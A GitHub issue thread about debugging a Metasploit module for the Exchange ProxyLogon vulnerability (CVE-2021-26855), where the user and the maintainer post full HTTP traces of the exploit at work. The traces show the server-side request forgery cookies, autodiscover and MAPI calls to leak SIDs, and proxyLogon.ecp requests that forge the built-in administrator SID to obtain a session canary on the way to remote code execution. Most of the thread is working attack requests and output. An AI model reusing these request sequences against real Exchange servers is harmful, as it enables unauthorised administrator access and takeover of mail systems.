Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Exploit aborted due to failure: not-found: No 'Client ID' was found #3

Closed
shodano opened this issue Mar 25, 2021 · 10 comments
Closed

Exploit aborted due to failure: not-found: No 'Client ID' was found #3

shodano opened this issue Mar 25, 2021 · 10 comments

Comments

@shodano
Copy link

shodano commented Mar 25, 2021

Hello,
Had this error recently on this branch

Exploit aborted due to failure: not-found: No 'Client ID' was found

On the main branch said got OAB error, though i think it's not related?

Any hints where I should look for?
@mekhalleh
Copy link
Owner

Please, use set HttpTrace true and send me the result.

@mekhalleh
Copy link
Owner

Exploit aborted due to failure: not-found: No 'Client ID' was found

This can happen when you never logged into the mailboxes.

@shodano
Copy link
Author

shodano commented Mar 26, 2021
edited
Loading

Edit
After some ping-pong emails got the <OABUrl>...</OABUrl> field (which brings me to the ideea that my server is vulnerable?) in the XML response but still the same error with the Client ID.

   EMAIL             Administrator@serv.local  
   METHOD            POST                      
   Proxies                                     no    
   RHOSTS            10.0.1.114             
   RPORT             443                       
   SRVHOST           0.0.0.0               
   SRVPORT           8080
   SSL               true        
   SSLCert                                     no
   URIPATH                                     no
   UseAlternatePath  false                     yes
   VHOST                                       no        

  EXITFUNC  process          yes       
   LHOST       ....               yes       
   LPORT     4444             yes    



Exploit target:

   Id  Name
   --  ----
   2   Windows Command

####################

Request:

####################

POST /ecp/W.js HTTP/1.1
Host: 10.0.1.114
User-Agent: Mozilla/5.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

####################

Response:

####################

HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
request-id: e260be1f-b500-492b-8a90-35c12e0fd202
X-CalculatedBETarget: localhost
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: MX2016-SERV
Date: Fri, 26 Mar 2021 07:54:12 GMT
Content-Length: 85

####################

Request:

####################

RPC_IN_DATA /rpc/rpcproxy.dll HTTP/1.1
Host: 10.0.1.114
User-Agent: Mozilla/5.0
Authorization: NTLM *****
Content-Length: 0

####################

Response:

####################

HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/10.0
request-id: 71cc4233-fe3e-44a9-af1c-884425feddc2
WWW-Authenticate: NTLM  *****, Negotiate, Basic realm="10.0.1.114"
Date: Fri, 26 Mar 2021 07:54:12 GMT
Content-Length: 0

[] Internal server name (mx2016-serv.serv.local)
[] https://10.0.1.114:443 - Sending autodiscover request
####################

Request:

####################

POST /ecp/bef.js HTTP/1.1
Host: 10.0.1.114
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@mx2016-serv.serv.local/autodiscover/autodiscover.xml?a=~2033364721;
Content-Type: text/xml; charset=utf-8
Content-Length: 376

<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>Administrator@serv.local</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>

####################

Response:

####################

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/10.0
request-id: a74a3600-136a-4226-aded-b44f58d9e8fa
X-CalculatedBETarget: mx2016-serv.serv.local, mx2016-serv.serv.local
X-DiagInfo: MX2016-SERV
X-BEServer: MX2016-SERV
X-FEServer: MX2016-SERV, MX2016-SERV
X-AspNet-Version: 4.0.30319
Set-Cookie: X-BackEndCookie=S-1-5-18=rJqNiZqNgbKnzc/OydKsuq2p0YyajYnRk5CcnpOBzsbLzc/JzcjJxoHNz83O0s/M0s3Jq8/Hxc/Lxc7N; expires=Fri, 26-Mar-2021 08:04:12 GMT; path=/autodiscover; secure; HttpOnly
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 07:54:12 GMT
Content-Length: 3743

<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User>
      <DisplayName>Administrator</DisplayName>
      <LegacyDN>/o=SERV/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=d4011f9f71f7479799c62d25ab8c21f2-Administrator</LegacyDN>
      <AutoDiscoverSMTPAddress>Administrator@serv.local</AutoDiscoverSMTPAddress>
      <DeploymentId>b833b524-b798-4fb2-88ad-b9c3588559b8</DeploymentId>
    </User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <MicrosoftOnline>False</MicrosoftOnline>
      <Protocol>
        <Type>EXCH</Type>
        <Server>cc96ea88-1aba-4dbe-8df8-7ad1b36c1349@serv.local</Server>
        <ServerDN>/o=SERV/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=cc96ea88-1aba-4dbe-8df8-7ad1b36c1349@serv.local</ServerDN>
        <ServerVersion>73C186B1</ServerVersion>
        <MdbDN>/o=SERV/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=cc96ea88-1aba-4dbe-8df8-7ad1b36c1349@serv.local/cn=Microsoft Private MDB</MdbDN>
        <PublicFolderServer>mx2016-serv.serv.local</PublicFolderServer>
        <AD>DC-1.serv.local</AD>
        <ASUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</ASUrl>
        <EwsUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</EwsUrl>
        <EmwsUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</EmwsUrl>
        <EcpUrl>https://mx2016-serv.serv.local/owa/</EcpUrl>
        <EcpUrl-um>?path=/options/callanswering</EcpUrl-um>
        <EcpUrl-aggr>?path=/options/connectedaccounts</EcpUrl-aggr>
        <EcpUrl-mt>options/ecp/PersonalSettings/DeliveryReport.aspx?rfr=olk&amp;exsvurl=1&amp;IsOWA=&lt;IsOWA&gt;&amp;MsgID=&lt;MsgID&gt;&amp;Mbx=&lt;Mbx&gt;&amp;realm=serv.local</EcpUrl-mt>
        <EcpUrl-ret>?path=/options/retentionpolicies</EcpUrl-ret>
        <EcpUrl-sms>?path=/options/textmessaging</EcpUrl-sms>
        <EcpUrl-photo>?path=/options/myaccount/action/photo</EcpUrl-photo>
        <EcpUrl-tm>options/ecp/?rfr=olk&amp;ftr=TeamMailbox&amp;exsvurl=1&amp;realm=serv.local</EcpUrl-tm>
        <EcpUrl-tmCreating>options/ecp/?rfr=olk&amp;ftr=TeamMailboxCreating&amp;SPUrl=&lt;SPUrl&gt;&amp;Title=&lt;Title&gt;&amp;SPTMAppUrl=&lt;SPTMAppUrl&gt;&amp;exsvurl=1&amp;realm=serv.local</EcpUrl-tmCreating>
        <EcpUrl-tmEditing>options/ecp/?rfr=olk&amp;ftr=TeamMailboxEditing&amp;Id=&lt;Id&gt;&amp;exsvurl=1&amp;realm=serv.local</EcpUrl-tmEditing>
        <EcpUrl-extinstall>?path=/options/manageapps</EcpUrl-extinstall>
        <OOFUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</OOFUrl>
        <UMUrl>https://mx2016-serv.serv.local/EWS/UM2007Legacy.asmx</UMUrl>
        <ServerExclusiveConnect>off</ServerExclusiveConnect>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>mx2016-serv.serv.local</Server>
        <SSL>Off</SSL>
        <AuthPackage>Ntlm</AuthPackage>
        <ServerExclusiveConnect>on</ServerExclusiveConnect>
        <CertPrincipalName>None</CertPrincipalName>
        <GroupingInformation>Default-First-Site-Name</GroupingInformation>
      </Protocol>
      <Protocol>
        <Type>WEB</Type>
        <Internal>
          <OWAUrl AuthenticationMethod="Basic, Fba">https://mx2016-serv.serv.local/owa/</OWAUrl>
          <Protocol>
            <Type>EXCH</Type>
            <ASUrl>https://mx2016-serv.serv.local/EWS/Exchange.asmx</ASUrl>
          </Protocol>
        </Internal>
      </Protocol>
    </Account>
  </Response>
</Autodiscover>

[-] Exploit aborted due to failure: not-found: No 'Client ID' was found
[*] Exploit completed, but no session was created.

@mekhalleh
Copy link
Owner

Thanks for reply. I removed the ClientID because I Don't think is useful for take the RCE.

@shodano
Copy link
Author

shodano commented Mar 26, 2021

OK, didn't knew that.
Also, a new error, a bit off-topic though, but worthwhile if you can explain why, just to help others if they encounter this:

Screenshot from 2021-03-26 13-59-52

@mekhalleh
Copy link
Owner

send me httptrace please, because I need to read that.

@shodano
Copy link
Author

shodano commented Mar 26, 2021
edited
Loading

I will update with full httptrace asap,
For now I've noticed that:

The response for POST /ecp/Lf.js HTTP/1.1 ( the one with the <AcceptableResponseSchema>)comes with a parameter in the header: Set-Cookie: X-BackEndCookie=S-1-5-18 ... which I've read it's local admin.

After the second POST /ecp/Lf.js HTTP/1.1 with the LegacyDN this time, the response comes with:

Microsoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '[LegacyDN]' with SID S-1-5-21-.... and MasterAccountSid (StoreError=LoginPerm)

SID S-1-5-21 is for Domain Admin
And I think that's the problem, the cookies should be set to S-1-5-21?

@mekhalleh
Copy link
Owner

This is what i know :

Seem to be the same mistake as : rapid7/metasploit-framework#14860 (comment)

...
[*]  * ASP.NET_SessionId: 017dae4e-8361-442b-9618-e3cc451e25ca
[*]  * msExchEcpCanary: XNknKMc-Z0ONdL_BNRyWUZqK3cfw6dgIwsx8-_e3l7dLfMONGiwSSHT6PlXW3uVcGG_u3TAnCNo.
####################
# Request:
####################
POST /ecp/oCb.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV02:444/ecp/DDI/DDIService.svc/GetList?reqId=1615583487987&schema=VirtualDirectory&msExchEcpCanary=XNknKMc-Z0ONdL_BNRyWUZqK3cfw6dgIwsx8-_e3l7dLfMONGiwSSHT6PlXW3uVcGG_u3TAnCNo.&a=~1942062522; ASP.NET_SessionId=017dae4e-8361-442b-9618-e3cc451e25ca; msExchEcpCanary=XNknKMc-Z0ONdL_BNRyWUZqK3cfw6dgIwsx8-_e3l7dLfMONGiwSSHT6PlXW3uVcGG_u3TAnCNo.;
msExchLogonMailbox: S-1-5-21-<redacted>-<redacted>-<redacted>-500
msExchTargetMailbox: S-1-5-21-<redacted>-<redacted>-<redacted>-1113
msExchLogonAccount: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
Content-Type: application/json; charset=utf-8
Content-Length: 159

{"filter":{"Parameters":{"__type":"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel","SelectedView":"","SelectedVDirType":"OAB"}},"sort":{}}
####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/10.0
request-id: 7176d4b8-373c-4d59-82a8-0d5e24058ff8
X-CalculatedBETarget: srv02
X-Content-Type-Options: nosniff
X-ECP-ERROR: Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException
jsonerror: true
X-DiagInfo: SRV02
X-BEServer: SRV02
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: SRV02
Date: Tue, 16 Mar 2021 09:32:42 GMT
Content-Length: 2125

{"Message":"Your request couldn't be completed. Please try again, and if the problem persists, contact your administrator.","ExceptionDetail":{"HelpLink":null,"InnerException":null,"Message":"You don't have permission to open this page. If you're a new user or were recently assigned credentials, please wait 15 minutes and try again.","StackTrace":"   at Microsoft.Exchange.Management.DDIService.CmdletActivity.IsRunnable(DataRow input, DataTable dataTable, DataObjectStore store)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.BranchActivity.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.Workflow.Run(DataRow input, DataTable dataTable, DataObjectStore store, Type codeBehind, UpdateTableDelegate updateTableDelegate)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.WSListDataHandler.ExecuteCore(Workflow workflow)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.WSDataHandler.Execute()\u000d\u000a   at Microsoft.Exchange.Management.DDIService.DDIServiceHelper.GetListCommon(DDIParameters filter, SortOptions sort, Boolean forGetProgress)\u000d\u000a   at Microsoft.Exchange.Management.DDIService.DDIService.GetList(DDIParameters filter, SortOptions sort)\u000d\u000a   at SyncInvokeGetList(Object , Object[] , Object[] )\u000d\u000a   at System.ServiceModel.Dispatcher.SyncMethodInvoker.Invoke(Object instance, Object[] inputs, Object[]& outputs)\u000d\u000a   at System.ServiceModel.Dispatcher.DispatchOperationRuntime.InvokeBegin(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage5(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.ImmutableDispatchRuntime.ProcessMessage11(MessageRpc& rpc)\u000d\u000a   at System.ServiceModel.Dispatcher.MessageRpc.Process(Boolean isOperationContextSet)","Type":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException"},"ExceptionType":"Microsoft.Exchange.Configuration.Authorization.CmdletAccessDeniedException","StackTrace":null}
[-] Exploit aborted due to failure: unknown: No 'OAB Id' was found
[*] Exploit completed, but no session was created.

On the Rapid7 lab, this was not working. but I ended up correcting this by playing on the SID (rapid7/metasploit-framework#14860 (comment)).

####################
# Request:
####################
POST /ecp/ExC.js HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0
Cookie: X-BEResource=Admin@SRV04:444/ecp/proxyLogon.ecp?a=~1942062522;
msExchLogonMailbox: S-1-5-21-<redacted>-<redacted>-<redacted>-500
msExchTargetMailbox: S-1-5-21-<redacted>-<redacted>-<redacted>-500
Content-Type: text/xml; charset=utf-8
Content-Length: 91

<r at="Negotiate" ln="TestUserDA"><s>S-1-5-21-<redacted>-<redacted>-<redacted>-1113</s></r>
####################
# Response:
####################
HTTP/1.1 241
Cache-Control: private
Server: Microsoft-IIS/8.5
request-id: 48b24cbd-b46f-482a-a52a-3232cced0b2e
X-CalculatedBETarget: srv04
X-Content-Type-Options: nosniff
X-DiagInfo: SRV04
X-BEServer: SRV04
X-UA-Compatible: IE=10
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=57df27a1-5a76-4fb4-9eb9-54c61d946058; path=/; secure; HttpOnly, msExchEcpCanary=f4tPXZALuUSKRDt4Ss4K4RhRqmiC69gIogOzyRK_aIYvxRFWMmng3nsNaCFMy7chn9i7FIevbfc.; path=/ecp
X-Powered-By: ASP.NET
X-FEServer: SRV04
Date: Thu, 18 Mar 2021 09:27:40 GMT
Content-Length: 0

The official module is always the one that was added in metasploit (in the master branch https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/http/exchange_proxylogon_rce.rb)

But if you told me that this one does not work? can you confirm ?

Is that there is one thing missing in the request to proxyLogon.ecp to obtain the elevation.

And to make things more difficult, I cannot reproduce this case in my lab. But maybe you can share yours?

This is what it gives on my lab (full trace):

msf6 exploit(windows/http/exchange_proxylogon_rce) > run

[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
####################
# Request:
####################
POST /ecp/W.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


####################
# Response:
####################
HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/8.5
request-id: e0be217e-cda3-4904-a5a3-4de3a818a99f
Set-Cookie: ClientId=NSXDMSHGKIOXJHJQIELOQ; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly
X-CalculatedBETarget: localhost
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 85

NegotiateSecurityContext failed with for host 'localhost' with status 'TargetUnknown'
[+] https://172.20.2.110:443 - The target is vulnerable to CVE-2021-26855.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://172.20.2.110:443 - Attempt to exploit for CVE-2021-26855
[*] https://172.20.2.110:443 - Retrieving backend FQDN over RPC request
####################
# Request:
####################
RPC_IN_DATA /rpc/rpcproxy.dll HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Authorization: NTLM TlRMTVNTUAABAAAABQKIoAAAAAAAAAAAAAAAAAAAAAA=
Content-Length: 0


####################
# Response:
####################
HTTP/1.1 401 Unauthorized
Server: Microsoft-IIS/8.5
request-id: 58ab1ea2-bceb-42d5-aad1-49ccfbf02309
Set-Cookie: ClientId=X0R0ZSF0KNDAJCEQ; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly
WWW-Authenticate: NTLM TlRMTVNTUAACAAAACgAKADgAAAAFAomigy0Phw8IdbAAAAAAAAAAAIYAhgBCAAAABgOAJQAAAA9QAFcATgBFAEQAAgAKAFAAVwBOAEUARAABABAATABBAEIALQBBAEQAMAAxAAQAEgBwAHcAbgBlAGQALgBsAGEAYgADACQATABBAEIALQBBAEQAMAAxAC4AcAB3AG4AZQBkAC4AbABhAGIABQASAHAAdwBuAGUAZAAuAGwAYQBiAAcACAAogSnCZSLXAQAAAAA=, Negotiate, Basic realm="172.20.2.110"
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 0


[*] Internal server name (lab-ad01.pwned.lab)
[*] https://172.20.2.110:443 - Sending autodiscover request
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab/autodiscover/autodiscover.xml?a=~2070661181;
Content-Type: text/xml; charset=utf-8
Content-Length: 376

<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
  <Request>
    <EMailAddress>gaston.lagaffe@pwned.lab</EMailAddress>
    <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
  </Request>
</Autodiscover>

####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Server: Microsoft-IIS/8.5
request-id: 58a1b436-b737-4bbb-86be-0cbef8e238f4
Set-Cookie: ClientId=IOZXAQS9KECJNCKZVHQQ; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly, X-BackEndCookie=S-1-5-18=rJqNiZqNgbO+vdK+u8/O0Y+IkZqb0ZOenYHOxsvOxsbIz87Igc3Pzc7Sz8zSzcmrzsjFy8/Fy8g=; expires=Fri, 26-Mar-2021 17:40:47 GMT; path=/autodiscover; secure; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab, lab-ad01.pwned.lab
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-FEServer: LAB-AD01, LAB-AD01
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 4117

<?xml version="1.0" encoding="utf-8"?>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/responseschema/2006">
  <Response xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <User>
      <DisplayName>Gaston LAGAFFE</DisplayName>
      <LegacyDN>/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5c9b77b49e5d4996a66ad6276a4955d9-Gaston LAG</LegacyDN>
      <AutoDiscoverSMTPAddress>gaston.lagaffe@pwned.lab</AutoDiscoverSMTPAddress>
      <DeploymentId>ee782f37-2118-4c07-96a4-7f6ae4494b29</DeploymentId>
    </User>
    <Account>
      <AccountType>email</AccountType>
      <Action>settings</Action>
      <MicrosoftOnline>False</MicrosoftOnline>
      <Protocol>
        <Type>EXCH</Type>
        <Server>98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab</Server>
        <ServerDN>/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab</ServerDN>
        <ServerVersion>73C085D9</ServerVersion>
        <MdbDN>/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Configuration/cn=Servers/cn=98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab/cn=Microsoft Private MDB</MdbDN>
        <PublicFolderServer>lab-ad01.pwned.lab</PublicFolderServer>
        <AD>LAB-AD01.pwned.lab</AD>
        <ASUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</ASUrl>
        <EwsUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</EwsUrl>
        <EmwsUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</EmwsUrl>
        <EcpUrl>https://lab-ad01.pwned.lab/ecp/</EcpUrl>
        <EcpUrl-um>?rfr=olk&amp;p=customize/voicemail.aspx&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-um>
        <EcpUrl-aggr>?rfr=olk&amp;p=personalsettings/EmailSubscriptions.slab&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-aggr>
        <EcpUrl-mt>PersonalSettings/DeliveryReport.aspx?rfr=olk&amp;exsvurl=1&amp;IsOWA=&lt;IsOWA&gt;&amp;MsgID=&lt;MsgID&gt;&amp;Mbx=&lt;Mbx&gt;&amp;realm=pwned.lab</EcpUrl-mt>
        <EcpUrl-ret>?rfr=olk&amp;p=organize/retentionpolicytags.slab&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-ret>
        <EcpUrl-sms>?rfr=olk&amp;p=sms/textmessaging.slab&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-sms>
        <EcpUrl-publish>customize/calendarpublishing.slab?rfr=olk&amp;exsvurl=1&amp;FldID=&lt;FldID&gt;&amp;realm=pwned.lab</EcpUrl-publish>
        <EcpUrl-photo>PersonalSettings/EditAccount.aspx?rfr=olk&amp;chgPhoto=1&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-photo>
        <EcpUrl-tm>?rfr=olk&amp;ftr=TeamMailbox&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-tm>
        <EcpUrl-tmCreating>?rfr=olk&amp;ftr=TeamMailboxCreating&amp;SPUrl=&lt;SPUrl&gt;&amp;Title=&lt;Title&gt;&amp;SPTMAppUrl=&lt;SPTMAppUrl&gt;&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-tmCreating>
        <EcpUrl-tmEditing>?rfr=olk&amp;ftr=TeamMailboxEditing&amp;Id=&lt;Id&gt;&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-tmEditing>
        <EcpUrl-extinstall>Extension/InstalledExtensions.slab?rfr=olk&amp;exsvurl=1&amp;realm=pwned.lab</EcpUrl-extinstall>
        <OOFUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</OOFUrl>
        <UMUrl>https://lab-ad01.pwned.lab/EWS/UM2007Legacy.asmx</UMUrl>
        <ServerExclusiveConnect>off</ServerExclusiveConnect>
      </Protocol>
      <Protocol>
        <Type>EXPR</Type>
        <Server>lab-ad01.pwned.lab</Server>
        <SSL>Off</SSL>
        <AuthPackage>Ntlm</AuthPackage>
        <ServerExclusiveConnect>on</ServerExclusiveConnect>
        <CertPrincipalName>None</CertPrincipalName>
        <GroupingInformation>Default-First-Site-Name</GroupingInformation>
      </Protocol>
      <Protocol>
        <Type>WEB</Type>
        <Internal>
          <OWAUrl AuthenticationMethod="Basic, Fba">https://lab-ad01.pwned.lab/owa/</OWAUrl>
          <Protocol>
            <Type>EXCH</Type>
            <ASUrl>https://lab-ad01.pwned.lab/EWS/Exchange.asmx</ASUrl>
          </Protocol>
        </Internal>
      </Protocol>
    </Account>
  </Response>
</Autodiscover>
[*] Server: 98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab
[*] LegacyDN: /o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5c9b77b49e5d4996a66ad6276a4955d9-Gaston LAG
[*] https://172.20.2.110:443 - Sending mapi request
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/mapi/emsmdb?MailboxId=98ebc2b9-189b-487c-9398-59092f58bd9f@pwned.lab&a=~2065407810;
X-RequestType: Connect
X-ClientInfo: {1AA18248-910B-3423-442E-CB6E06BF0F7E}
X-ClientApplication: Outlook/15.0.4815.1002
X-RequestId: {437CBADF-0ACD-6290-C02F-D6503968A46F}:38938
Content-Type: application/mapi-http
Content-Length: 149

/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5c9b77b49e5d4996a66ad6276a4955d9-Gaston LAG�		
####################
# Response:
####################
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: application/mapi-http
Server: Microsoft-IIS/8.5
request-id: 502e64ff-b7f7-47b6-9632-375d1ae885e8
Set-Cookie: ClientId=EGLTLLPUOLAQXHPV0Q; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly, MapiContext=MAPIAAAAAOmo6seGwvLD4NLi0OHM/M/i0ObG98D6yPrA8MGbuIm6iL+NvYm+j7sQAAAAAAAAAA==; path=/mapi/emsmdb; secure; HttpOnly, MapiSequence=0-b8roYg==; path=/mapi/emsmdb; secure; HttpOnly
X-CalculatedBETarget: lab-ad01.pwned.lab
X-ServerApplication: Exchange/15.00.1497.000
X-RequestId: {437CBADF-0ACD-6290-C02F-D6503968A46F}:38938
X-ClientInfo: {1AA18248-910B-3423-442E-CB6E06BF0F7E}
X-RequestType: Connect
X-TunnelExpirationTime: 1800000
X-PendingPeriod: 30000
X-ExpirationInfo: 900000
X-ResponseCode: 0
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-FEServer: LAB-AD01
Date: Fri, 26 Mar 2021 17:30:47 GMT
Content-Length: 1128

PROCESSING
DONE
X-StartTime: Fri, 26 Mar 2021 17:30:47 GMT
X-ElapsedTime: 15

����CLAB-AD01.pwned.la�KClientAccessServer=LAB-AD01.pwned.lab,ConnectTime=26/03/2021 21:30:47,ConnectionID=17

�
 $IMicrosoft.Exchange.RpcClientAccess.Server.LoginPermException: 'User SID: S-1-5-18' can't act as owner of a UserMailbox object '/o=Pwned Lab2k13/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=5c9b77b49e5d4996a66ad6276a4955d9-Gaston LAG' with SID S-1-5-21-3876225949-3666446388-246247518-1140 and MasterAccountSid  (StoreError=LoginPerm)
   at Microsoft.Exchange.RpcClientAccess.Server.UserManager.User.CorrelateIdentityWithLegacyDN(ClientSecurityContext clientSecurityContext)
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.<>c__DisplayClassc.<Connect>b__8()
   at Microsoft.Exchange.RpcClientAccess.Server.RpcDispatch.ExecuteWrapper(Func`1 getExecuteParameters, Func`1 executeDelegate, Action`1 exceptionSerializationDelegate)
[*] SID: S-1-5-21-3876225949-3666446388-246247518-1140 (gaston.lagaffe@pwned.lab)
[*] https://172.20.2.110:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
####################
# Request:
####################
POST /ecp/SNu.js HTTP/1.1
Host: 172.20.2.110
User-Agent: Mozilla/5.0
Cookie: X-BEResource=[:[@lab-ad01.pwned.lab:444/ecp/proxyLogon.ecp?a=~2089338109;
msExchLogonMailbox: S-1-5-21-3876225949-3666446388-246247518-500
msExchTargetMailbox: S-1-5-21-3876225949-3666446388-246247518-500
Content-Type: text/xml; charset=utf-8
Content-Length: 93

<r at="Negotiate" ln="gaston.lagaffe"><s>S-1-5-21-3876225949-3666446388-246247518-500</s></r>
####################
# Response:
####################
HTTP/1.1 241
Cache-Control: private
Server: Microsoft-IIS/8.5
request-id: f6df0b16-d018-4295-b334-52ef9bfdee00
Set-Cookie: ClientId=KFAYSEOGHUOHNMYBJBBG; expires=Sat, 26-Mar-2022 17:30:47 GMT; path=/; HttpOnly, ASP.NET_SessionId=add16fb3-f7c7-4aa8-a2de-63bc2199acdb; path=/; HttpOnly, msExchEcpCanary=cROKk7ES8k2z7ADPHMSSM8MxuTkP8tgI1jXMCwS47YR8ZCV2iiiwjAvkWt3NcwpSIeghnLZYJSI.; path=/ecp
X-CalculatedBETarget: lab-ad01.pwned.lab
X-Content-Type-Options: nosniff
X-DiagInfo: LAB-AD01
X-BEServer: LAB-AD01
